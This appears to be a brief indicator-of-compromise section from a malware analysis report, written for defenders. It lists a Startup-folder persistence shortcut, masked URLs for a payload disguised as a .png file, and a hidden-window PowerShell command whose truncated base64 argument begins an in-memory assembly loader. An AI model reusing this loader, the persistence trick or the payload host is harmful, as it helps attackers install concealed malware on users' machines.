Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\geeks hangout.url
- http://www.4u##.com/uploads/file_2020-04-22_190444.png
- http://www.4u##.com/uploads/file_2020-04-22_190444.png
- http://www.4u##.com/?40#
- DNS ASK 4u##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBq...' (with hidden window)